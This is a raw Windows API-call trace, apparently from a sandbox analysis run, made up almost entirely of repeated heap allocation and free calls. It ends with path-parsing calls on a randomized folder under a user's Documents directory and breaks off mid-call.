[0192.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0192.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.357] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\") returned="rQz y4W0rYbhQ_iRzD3\\" [0192.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0192.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.357] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0192.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41a88 [0192.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.358] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0192.358] RtlAllocateHeap 